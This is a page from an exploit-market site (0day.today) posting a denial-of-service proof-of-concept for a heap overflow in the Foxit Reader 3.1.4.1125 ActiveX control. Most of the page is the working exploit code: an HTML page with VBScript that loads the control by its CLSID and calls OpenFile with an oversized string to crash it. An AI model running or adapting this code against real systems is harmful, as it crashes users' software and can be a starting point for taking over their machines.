[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC

Author
sarbot511
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10138
Category
dos / poc
Date add
19-01-2010
Platform
unsorted
==================================================
Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC
==================================================

#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125
 
<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>
 
targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1
  
arg1=String(6164, "A")
  
target.OpenFile arg1
  
</script>



#  0day.today [2024-12-24]  #